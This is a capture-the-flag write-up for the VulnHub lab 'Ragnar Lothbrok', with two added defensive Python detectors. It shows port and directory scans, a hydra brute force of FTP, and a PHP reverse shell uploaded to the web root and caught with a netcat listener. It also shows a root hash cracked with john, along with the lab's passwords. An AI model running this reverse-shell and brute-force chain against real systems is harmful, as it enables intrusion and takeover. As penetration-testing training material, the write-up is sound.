[VULNHUB] Ragnar Lothbrok

Today we are going to hack the VulnHub machine called Ragnar Lothbrok. You can download it from the following link: Ragnar Lothbrok

Enumeration


We start with an nmap scan to see which ports it has open.

> nmap -A -p- 192.168.1.137        
Starting Nmap 7.70 ( https://nmap.org ) at 2020-12-09 13:07 CET
Nmap scan report for armbjorn (192.168.1.137)
Host is up (0.00087s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE  VERSION
21/tcp   open  ftp      ProFTPD
80/tcp   open  http     Apache httpd 2.4.46 ((Unix) OpenSSL/1.1.1h PHP/7.2.34 mod_perl/2.0.11 Perl/v5.32.0)
|_http-server-header: Apache/2.4.46 (Unix) OpenSSL/1.1.1h PHP/7.2.34 mod_perl/2.0.11 Perl/v5.32.0
| http-title: Welcome to XAMPP
|_Requested resource was http://armbjorn/dashboard/
443/tcp  open  ssl/http Apache httpd 2.4.46 ((Unix) OpenSSL/1.1.1h PHP/7.2.34 mod_perl/2.0.11 Perl/v5.32.0)
|_http-server-header: Apache/2.4.46 (Unix) OpenSSL/1.1.1h PHP/7.2.34 mod_perl/2.0.11 Perl/v5.32.0
| http-title: Welcome to XAMPP
|_Requested resource was https://armbjorn/dashboard/
| ssl-cert: Subject: commonName=localhost/organizationName=Apache Friends/stateOrProvinceName=Berlin/countryName=DE
| Not valid before: 2004-10-01T09:10:30
|_Not valid after:  2010-09-30T09:10:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|   http/1.1
3306/tcp open  mysql?
| fingerprint-strings: 
|   NULL: 
|_    Host 'aVa.home' is not allowed to connect to this MariaDB server
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.70%I=7%D=12/9%Time=5FD0BDF1%P=x86_64-pc-linux-gnu%r(NU
SF:LL,47,"C\0\0\x01\xffj\x04Host\x20'aVa\.home'\x20is\x20not\x20allowed\x2
SF:0to\x20connect\x20to\x20this\x20MariaDB\x20server");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.67 seconds
Of all the open ports, we start by examining the web server in more detail to see if we can find any interesting files.

> gobuster dir -u http://armbjorn -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://armbjorn
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/12/09 13:02:12 Starting gobuster
===============================================================
/img (Status: 301)
/wordpress (Status: 301)
/dashboard (Status: 301)
/secret (Status: 200)
/phpmyadmin (Status: 403)
/webalizer (Status: 301)
===============================================================
2020/12/09 13:04:50 Finished
===============================================================
We see that there is a /wordpress directory; visiting it, we find a user called ragnar. We also see a directory called /secret, which on inspection looks like a possible password list. We download it :)

> wget http://armbjorn/secret -O lista.txt
Knowing that a user called ragnar exists, we brute-force the FTP service using the list found in /secret as the dictionary and "ragnar" as the username.

> hydra -l ragnar -P lista.txt 192.168.1.137 ftp
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-12-09 13:07:27
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 4617 login tries (l:1/p:4617), ~289 tries per task
[DATA] attacking ftp://192.168.1.137:21/
[STATUS] 1797.00 tries/min, 1797 tries in 00:01h, 2824 to do in 00:02h, 16 active
[STATUS] 2071.00 tries/min, 4142 tries in 00:02h, 479 to do in 00:01h, 16 active
[21][ftp] host: 192.168.1.137   login: ragnar   password: lagertha
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-12-09 13:09:49
We got the password! We log in to the FTP server.
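From the defender's side, the run above leaves a very recognisable trace: the hydra status lines show around 1800 to 2000 tries per minute against one account from one source, followed by a success. The detector below is an added example, not part of the original write-up: it runs over constructed lines in the style of ProFTPD's syslog output and flags exactly that pattern; the client names, timestamps, threshold and window are assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime
# Constructed sample in the style of ProFTPD's syslog output (not logs from the box):
# one client hammering a single account and then succeeding, plus one unrelated failure.
SAMPLE_LOG = """\
Dec  9 13:07:27 armbjorn proftpd[2101]: armbjorn (client1[192.168.1.105]) - USER ragnar (Login failed): Incorrect password.
Dec  9 13:07:27 armbjorn proftpd[2102]: armbjorn (client1[192.168.1.105]) - USER ragnar (Login failed): Incorrect password.
Dec  9 13:07:28 armbjorn proftpd[2103]: armbjorn (client1[192.168.1.105]) - USER ragnar (Login failed): Incorrect password.
Dec  9 13:07:28 armbjorn proftpd[2104]: armbjorn (client1[192.168.1.105]) - USER ragnar (Login failed): Incorrect password.
Dec  9 13:07:29 armbjorn proftpd[2105]: armbjorn (client1[192.168.1.105]) - USER ragnar (Login failed): Incorrect password.
Dec  9 13:07:29 armbjorn proftpd[2106]: armbjorn (client1[192.168.1.105]) - USER ragnar: Login successful.
Dec  9 13:40:01 armbjorn proftpd[2300]: armbjorn (client2[192.168.1.50]) - USER ragnar (Login failed): Incorrect password.
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ proftpd\[\d+\]: \S+ "
    r"\([^\[]*\[(?P<src>[\d.]+)\]\) - USER (?P<user>\S+?):? "
    r"(?P<result>\(Login failed\)|Login successful)"
)

def parse(line):
    # Returns (timestamp, source IP, user, failed?) or None for unrelated lines.
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S")   # syslog lines carry no year
    return ts, m["src"], m["user"], m["result"] == "(Login failed)"

def detect_bruteforce(log_text, threshold=5, window_s=60):
    """Map (src, user) -> alert for every source with `threshold` failed logins for
    one account inside `window_s` seconds; `success_after` marks a later login."""
    recent = defaultdict(deque)   # (src, user) -> timestamps of recent failures
    alerts = {}
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        ts, src, user, failed = rec
        key = (src, user)
        if failed:
            q = recent[key]
            q.append(ts)
            while (ts - q[0]).total_seconds() > window_s:   # drop failures outside the window
                q.popleft()
            if len(q) >= threshold and key not in alerts:
                alerts[key] = {"first_alert": ts, "success_after": False}
        elif key in alerts:
            alerts[key]["success_after"] = True
    return alerts
```

A real deployment would feed the live log through the same function and raise on `success_after`, since a success that closes a burst of failures is the strongest sign that the guessed password worked.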

> ftp 192.168.1.137

Connected to 192.168.1.137.
220 ProFTPD Server (ProFTPD) [::ffff:192.168.1.137]
Name (192.168.1.137:sml): ragnar
331 Password required for ragnar
Password:
230 User ragnar logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> dir
200 PORT command successful
150 Opening ASCII mode data connection for file list
-rwxrwxr-x   1 33       33           3607 Aug 27  2019 applications.html
-rwxrwxr-x   1 33       33            177 Aug 27  2019 bitnami.css
drwxrwxr-x  21 33       33           4096 Dec  3 18:16 dashboard
-rwxrwxr-x   1 33       33          30894 May 11  2007 favicon.ico
drwxrwxr-x   2 33       33           4096 Dec  3 18:16 img
-rwxrwxr-x   1 33       33            260 Jul  9  2015 index.php
-rw-rw-r--   1 33       33          40578 Dec  3 19:00 secret
drwxrwxr-x   2 33       33           4096 Dec  3 18:14 webalizer
drwxrwxrwx   5 33       33           4096 Dec  9 12:02 wordpress
226 Transfer complete
ftp> 
From the directory structure and the folders in it, we can infer that this is the web server's document root... So we prepare a webshell:

~ > cp /usr/share/webshells/php/php-reverse-shell.php .
~ > mv php-reverse-shell.php shell.php
~ > nano shell.php #Change the port/IP
And we upload it!

ftp> put shell.php
local: shell.php remote: shell.php
200 PORT command successful
150 Opening BINARY mode data connection for shell.php
226 Transfer complete
5496 bytes sent in 0.00 secs (124.7951 MB/s)
Once the webshell is uploaded, we set nc listening.

> nc -nlvp 1234
listening on [any] 1234 ...
And we visit http://armbjorn/shell.php.
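For the defender, the three steps above (upload over FTP, listen, request the file over HTTP) produce two log entries that can be correlated: an incoming transfer in ProFTPD's xferlog and, shortly after, a request for the same file name in Apache's access log. The script below is an added example, not part of the original write-up; its log lines are constructed in those two formats, and the paths, timestamps and 30-minute window are assumptions.

```python
import re
from datetime import datetime, timedelta
# Constructed samples (not the box's real logs): a ProFTPD xferlog with the
# upload, and Apache access-log lines, one of which requests the uploaded file.
XFERLOG = """\
Wed Dec  9 13:10:02 2020 0 192.168.1.105 5496 /opt/lampp/htdocs/shell.php b _ i r ragnar ftp 0 * c
Wed Dec  9 13:10:05 2020 0 192.168.1.105 40578 /opt/lampp/htdocs/secret b _ o r ragnar ftp 0 * c
"""
ACCESS_LOG = """\
192.168.1.105 - - [09/Dec/2020:13:09:50 +0100] "GET /wordpress/ HTTP/1.1" 200 4821 "-" "Mozilla/5.0"
192.168.1.105 - - [09/Dec/2020:13:11:36 +0100] "GET /shell.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""
XFER_RE = re.compile(r"^(\w{3} \w{3}\s+\d+ \d\d:\d\d:\d\d \d{4}) \d+ (\S+) \d+ (\S+) \S \S ([io]) ")
ACCESS_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+)')
EXEC_EXT = (".php", ".phtml", ".php5", ".phar")   # extensions the web server would execute

def uploads(xferlog):
    """Incoming transfers from an xferlog: direction field 'i' means the client uploaded."""
    out = []
    for line in xferlog.splitlines():
        m = XFER_RE.match(line)
        if m and m[4] == "i":
            out.append({"ts": datetime.strptime(m[1], "%a %b %d %H:%M:%S %Y"),
                        "src": m[2], "name": m[3].rsplit("/", 1)[-1]})
    return out

def web_hits(access_log):
    """GET/POST requests from a combined access log, keyed by requested basename."""
    out = []
    for line in access_log.splitlines():
        m = ACCESS_RE.match(line)
        if m:   # both logs are assumed to be written in the same local time zone
            ts = datetime.strptime(m[2], "%d/%b/%Y:%H:%M:%S %z").replace(tzinfo=None)
            out.append({"ts": ts, "src": m[1], "name": m[3].split("?")[0].rsplit("/", 1)[-1]})
    return out

def correlate(xferlog, access_log, window=timedelta(minutes=30)):
    """(uploaded name, FTP source, first HTTP requester, seconds between) per script upload later requested."""
    alerts = []
    hits = web_hits(access_log)
    for up in uploads(xferlog):
        if not up["name"].lower().endswith(EXEC_EXT):
            continue
        for hit in hits:
            delta = hit["ts"] - up["ts"]
            if hit["name"] == up["name"] and timedelta(0) <= delta <= window:
                alerts.append((up["name"], up["src"], hit["src"], int(delta.total_seconds())))
                break
    return alerts
```

The root cause this catches is the FTP account writing straight into the document root; the fix is to point the FTP user at a directory the web server does not serve, or to disable PHP execution for upload locations.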

Low shell



> nc -nlvp 1234
listening on [any] 1234 ...
connect to [192.168.1.105] from (UNKNOWN) [192.168.1.137] 58860
Linux osboxes 5.4.0-42-generic #46-Ubuntu SMP Fri Jul 10 00:24:02 UTC 2020 
x86_64 x86_64 x86_64 GNU/Linux
 07:11:36 up 17 min,  0 users,  load average: 4.95, 5.40, 3.08
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1(daemon) gid=1(daemon) groups=1(daemon)
/bin/sh: 0: can't access tty; job control turned off
Once inside the system, we switch to ragnar with the password obtained earlier.

daemon@osboxes:/$ su ragnar
Password: lagertha
We see there is a file called secret. Let's see what it contains.

ragnar@osboxes:~$ /bin/cat secret
root:$6$hPrOGn8aOKa2ZMJm$gGKkorDjENhohzGBojBLO3ABOJEP/DjMtjRRl6FBlNAc.l.BnoH8rMWtWZiJGCTt2Nq5e7DFe51RRRTXjzN5h.
It looks like root's password hash :) We copy it to our machine and try to crack it with john.

> john --wordlist=/usr/share/wordlists/rockyou.txt ~/tocrack2.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
kevinmitnick     (root)
1g 0:00:05:31 DONE (2020-12-09 13:31) 0.003013g/s 2703p/s 2703c/s 2703C/s keya18..kete12
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Having cracked the password, we log in as root!

Privilege Escalation



ragnar@osboxes:~$ su root
Password: kevinmitnick

root.txt



root@osboxes:/home/ragnar# cd /root
root@osboxes:~# ls -la
total 56
drwx------  8 root root 4096 Dec  4 06:43 .
drwxr-xr-x 19 root root 4096 Jul 31 12:34 ..
-rw-------  1 root root  273 Dec  4 06:43 .bash_history
-rw-r--r--  1 root root    0 Dec  3 14:51 .bashrc
drwx------  5 root root 4096 Dec  3 14:24 .cache
drwxr-xr-x  5 root root 4096 Dec  3 13:52 .config
drwx------  3 root root 4096 Dec  3 13:52 .dbus
drwxr-xr-x  2 root root 4096 Dec  3 15:33 Desktop
drwx------  3 root root 4096 Dec  3 15:33 .gnupg
-rw-r--r--  1 root root  129 Dec  3 14:22 hello
drwxr-xr-x  3 root root 4096 Dec  3 11:16 .local
-rw-------  1 root root   18 Dec  3 13:02 .mysql_history
-rw-r--r--  1 root root  161 Dec  5  2019 .profile
-rw-------  1 root root    5 Dec  3 14:47 .python_history
-rw-r--r--  1 root root   66 Dec  3 12:36 .selected_editor
root@osboxes:~# cat hello
Congratulation Have a nice day
I'm very happy
How the little piglets would grunt if they knew how the old boar suffered

End


And with that we are root on the machine.